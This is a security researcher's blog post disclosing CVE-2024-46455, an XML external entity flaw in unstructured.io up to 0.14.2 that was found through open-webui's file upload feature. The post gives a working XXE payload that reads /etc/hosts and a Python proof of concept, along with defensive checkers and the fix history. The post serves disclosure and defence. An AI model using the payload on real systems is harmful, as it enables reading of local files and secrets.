CVE-2024-46455 : XML eXternal Entity vulnerability in unstructured.io <= 0.14.2


Before proceeding, I would like to give a shoutout to my awesome friend and colleague Mohit K, who tagged along on this journey and played a pivotal role.
Summary
This blog is the result of applied vulnerability research that we did against open-webui. (For those who don't know, open-webui provides the UI for Ollama AI models.)
open-webui has a feature to upload files and then ask models to answer from the uploaded content. This is where our internal security team found this vulnerability. At first look we thought it was an issue in the open-webui project itself. This specific vulnerability caught my interest, and on digging further we realized that we were looking at a new CVE!
Exploitation Steps
We uploaded a malicious XML payload to the open-webui chat window, and upon asking questions about the uploaded document, we saw that the response displayed the contents of a local file. At first I thought this could be the LLM hallucinating and producing a garbage response.
To confirm this, I looked into the source code of open-webui for the code responsible for processing the uploaded document.
The process_doc function internally calls the get_loader function to find the appropriate loader for the document based on its content-type.
[ removed the lines in between these snippets to save your eyes ]
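Since the snippets are trimmed, here is a minimal sketch of what content-type based loader selection can look like. This is not open-webui's actual code: the function `choose_loader_name`, the mapping, and the fallback are all hypothetical, and only the name UnstructuredXMLLoader comes from the research described here.

```python
# Hypothetical sketch of content-type based loader selection.
# NOT open-webui's real get_loader; the names and mapping are assumptions.

# Assumed mapping from MIME type to the name of a loader class.
LOADER_BY_CONTENT_TYPE = {
    "application/xml": "UnstructuredXMLLoader",
    "text/xml": "UnstructuredXMLLoader",
    "text/plain": "TextLoader",
}


def choose_loader_name(content_type: str, default: str = "TextLoader") -> str:
    """Return the loader name for a content type, ignoring parameters."""
    # "text/xml; charset=utf-8" -> "text/xml"
    mime = content_type.split(";", 1)[0].strip().lower()
    return LOADER_BY_CONTENT_TYPE.get(mime, default)


print(choose_loader_name("text/xml; charset=utf-8"))
```

The takeaway is that an upload with an XML content type ends up in an XML parser, so any weakness in that parser is reachable straight from the upload feature.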
A bump on our journey
UnstructuredXMLLoader comes from the langchain library, which contains a few other loaders.
Now you may wonder what these loaders are. They are nothing but classes that have functions to parse documents and load their contents, so that our LLMs can interpret the context and answer our questions from them.
They are named this way so that it is similar to Java's interfaces and their implementations.
Just when we thought our journey had hit a wall and we were not sure what to do, we checked whether there were any known vulnerabilities against this library. To our surprise there was one, but it was not against the function we were looking at.
We then looked further into this vulnerability, and after a few hours we got to know that it is not present in the latest version of langchain. This gave us the idea of testing for it by stepping down through older versions of the langchain library.
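The interface analogy can be sketched in a few lines. The classes below are hypothetical stand-ins written for illustration, not langchain's real classes: an abstract loader defines `load()`, and each concrete loader implements it for one file format.

```python
# Hypothetical stand-ins for the loader pattern; not langchain's classes.
import tempfile
from abc import ABC, abstractmethod
from dataclasses import dataclass
from pathlib import Path
from typing import List


@dataclass
class Doc:
    """Text handed to the LLM plus the path it came from."""
    text: str
    source: str


class Loader(ABC):
    """The 'interface': every loader turns a file into a list of Docs."""

    def __init__(self, path: str) -> None:
        self.path = path

    @abstractmethod
    def load(self) -> List[Doc]:
        ...


class PlainTextLoader(Loader):
    """One 'implementation': reads the whole file as UTF-8 text."""

    def load(self) -> List[Doc]:
        text = Path(self.path).read_text(encoding="utf-8")
        return [Doc(text=text, source=self.path)]


# Usage: write a small file and load it back.
with tempfile.TemporaryDirectory() as tmp:
    sample = Path(tmp) / "note.txt"
    sample.write_text("hello loader", encoding="utf-8")
    docs = PlainTextLoader(str(sample)).load()
    print(docs[0].text)
```

An XML loader follows the same shape, except that its `load()` runs an XML parser over the file, which is where entity handling becomes relevant.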
Finding the vulnerable version
Our testing showed that langchain==0.2.14 was secure against this vulnerability,
but langchain==0.2.0, which uses unstructured==0.14.2, was vulnerable!
# vulnerable on unstructured <= 0.14.2
from langchain_community.document_loaders import UnstructuredXMLLoader
loader = UnstructuredXMLLoader("/path/to/xxe/payload.xml")
data = loader.load()
print(data)
<?xml version="1.0" ?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/hosts"> ]>
<userInfo>
<username>&ent;</username>
</userInfo>
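The dangerous part of this payload is the DOCTYPE: it declares an entity named ent whose value is the content of a local file, and &ent; asks the parser to substitute it. As a minimal sketch, Python's standard expat bindings can list such declarations without installing any handler that fetches them. The helper name `find_external_entities` is hypothetical, and this is only an inspection aid, not the fix that unstructured shipped.

```python
# Sketch: list external entity declarations in an XML document.
# No ExternalEntityRefHandler is installed, so nothing is fetched.
import xml.parsers.expat
from typing import List, Tuple

PAYLOAD = b"""<?xml version="1.0" ?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/hosts"> ]>
<userInfo>
<username>&ent;</username>
</userInfo>
"""


def find_external_entities(xml_bytes: bytes) -> List[Tuple[str, str]]:
    """Return (entity name, system id) for each external entity declared."""
    found = []

    def on_entity_decl(name, is_parameter, value, base,
                       system_id, public_id, notation_name):
        # expat passes value=None for external entities.
        if value is None and system_id is not None:
            found.append((name, system_id))

    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    try:
        parser.Parse(xml_bytes, True)
    except xml.parsers.expat.ExpatError:
        # Malformed input: keep whatever was declared before the error.
        pass
    return found


print(find_external_entities(PAYLOAD))
```

Any document that comes back with a file:// system id is asking the parser to read from the local disk.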
If you are into applied vulnerability research, you know what it means to have one vulnerable version and one secure version! Now that we know the vulnerable version, we have to look at the changelog to see what changes were introduced.
I'm sure that caught your eye too! The team fixed a vulnerability without publishing a security advisory, and due to this there is no record of this vulnerability anywhere on the internet.
It is quite possible that a lot of developers are still using the older version, and no SCA scanner would be able to alert them. WOW!
The pull request that fixed this issue: https://github.com/Unstructured-IO/unstructured/pull/3088/commits
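Because no advisory existed, a manual check is one way to find out whether an environment is affected. Here is a minimal sketch, assuming the affected range is exactly what this post found (unstructured <= 0.14.2). The helper names are hypothetical and the version parsing is deliberately simple, so pre-release suffixes are ignored.

```python
# Sketch: flag an installed unstructured version in the range from this post.
import re
from importlib import metadata
from typing import Optional, Tuple

LAST_VULNERABLE = (0, 14, 2)  # per this post: unstructured <= 0.14.2


def parse_version(version: str) -> Tuple[int, ...]:
    """Parse the leading dotted numbers, e.g. '0.14.2.dev1' -> (0, 14, 2)."""
    match = re.match(r"\d+(?:\.\d+)*", version)
    if match is None:
        raise ValueError(f"unrecognized version: {version!r}")
    return tuple(int(part) for part in match.group().split("."))


def is_vulnerable(version: str) -> bool:
    """True when the version falls in the assumed affected range."""
    return parse_version(version) <= LAST_VULNERABLE


def installed_unstructured_version() -> Optional[str]:
    """Return the installed version string, or None if not installed."""
    try:
        return metadata.version("unstructured")
    except metadata.PackageNotFoundError:
        return None


found = installed_unstructured_version()
if found is None:
    print("unstructured is not installed")
else:
    status = "in affected range" if is_vulnerable(found) else "not in affected range"
    print(found, status)
```

This only inspects the current Python environment; pinned versions in lock files or container images would need the same comparison applied to them.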
Proof of Concept
# vulnerable on unstructured <= 0.14.2
from unstructured.partition.xml import partition_xml
data = partition_xml(filename="./payload.xml")
print([x.text for x in data])
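To reproduce this without reading a real system file, one option is to point the entity at a canary file that you create yourself. The sketch below only builds the files; the helper name `build_payload`, the canary string, and the file names are hypothetical. On a vulnerable version, running the partition_xml call above against the generated payload would be expected to show the canary string in the output.

```python
# Sketch: generate an XXE payload that targets a harmless canary file.
import tempfile
from pathlib import Path

CANARY_TEXT = "xxe-canary-12345"  # arbitrary marker, easy to spot in output


def build_payload(target: Path) -> str:
    """Return an XML document whose entity points at the target file."""
    uri = target.resolve().as_uri()  # absolute path as a file:// URI
    return (
        '<?xml version="1.0" ?>\n'
        f'<!DOCTYPE replace [<!ENTITY ent SYSTEM "{uri}"> ]>\n'
        "<userInfo>\n"
        "<username>&ent;</username>\n"
        "</userInfo>\n"
    )


workdir = Path(tempfile.mkdtemp())
canary = workdir / "canary.txt"
canary.write_text(CANARY_TEXT, encoding="utf-8")

payload_path = workdir / "payload.xml"
payload_path.write_text(build_payload(canary), encoding="utf-8")
print("payload written to", payload_path)
```

If the canary string appears in the printed elements, the installed version is resolving external entities.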
Conclusion
And with this, we concluded that we had re-discovered a vulnerability that was fixed without notifying the users of the package. In general, this is not considered good security practice. Users should be told about a vulnerability even if it is fixed in the very next release; this helps them plan their updates and avoid unnecessary breaches caused by outdated versions of the library.
I am attaching the canvas I used during this vulnerability research; I hope you find it interesting!
Written by

Mohanraj R
I'm the exact person your mom threatened you would become like; if you didn't get off the computer and go out to socialize 🥷🏽